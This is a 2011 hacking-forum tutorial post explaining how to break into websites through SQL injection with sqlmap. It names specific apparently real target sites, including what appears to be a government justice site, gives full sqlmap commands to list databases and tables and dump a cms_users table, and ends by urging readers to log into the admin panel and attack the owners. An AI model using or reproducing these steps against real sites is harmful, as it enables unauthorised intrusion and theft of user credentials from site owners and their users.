Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[SQL]how to hack almost every site with sqlmap filter_list
Author
Message
[SQL]how to hack almost every site with sqlmap #1
Hello, today i am gonna show you how to hack almost every site vuln on SQL...

Start

- - - - - - - - - -

First of all you must to find some vuln sites...

Our target is : http://www.zwcad.org/

vuln : http://www.zwcad.org/download_form.php?id=107

to se if it is vuln try to add ' on url, like this :

http://www.zwcad.org/download_form.php?id=107'

- - - - - - - - - - - - - - - - - - - - - - - - - -

now when we have some vuln sites we can open a sqlmap...

Start>Backtrack>Exploitation Tools>Web Exploitation Tools>sqlmap

This is on a BackTrack 5...

- - - - - - - - - - - - - - - - - - - - - - - - - - - -

Now we must type some commands..

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 --dbs

It looks like this :[Image: step1.jpg]

when we hit the ENTER the scan is started and when scan is over we will get database's, it looks like this : [Image: wewillgotesomething.jpg]

Then we must put another commands to start searching a tables..
that command is :

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB --tables


When you hit the enter the tables seraching is started and when it's over we get this info :
[Image: tablessearching.jpg]

Now we must type a third command for searching columns, but dirst we must to chose a one table to get columns. I chose a cms_users table..

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users --dump

And you will get this : [Image: end.jpg]

You can to this too : Step by step..
To type a command for coloumns :

python sqlmap.py -u http://www.justice.gov.al/index.php?gj=gj1 -D justice2011DB -T cms_users -C herethecolumnname --dump

With this command we will get a info about one column..
Like this : [Image: columnss.jpg]

Ypu always can find your files fump in : /pentest/web/scanners/sqlmap/output/

Now when we get the all info, we only must to find a admin panel and to log in and FUCK THEM !!! Smile

If you like this tutorial give me +1 rep !

Sorry about my bad English, if i make some mistakes ! Biggrin

Happy hacking ! Biggrin

#################################################
####################~Tut by KaiT_AleX~################
##################################################




[Image: 1308031172619.gif?w=356&h=140]
Don't learn to hack, hack to learn.

[+] 1 user Likes KaiT_AleX's post
Reply





Messages In This Thread
[SQL]how to hack almost every site with sqlmap - by KaiT_AleX - 07-24-2011, 10:24 PM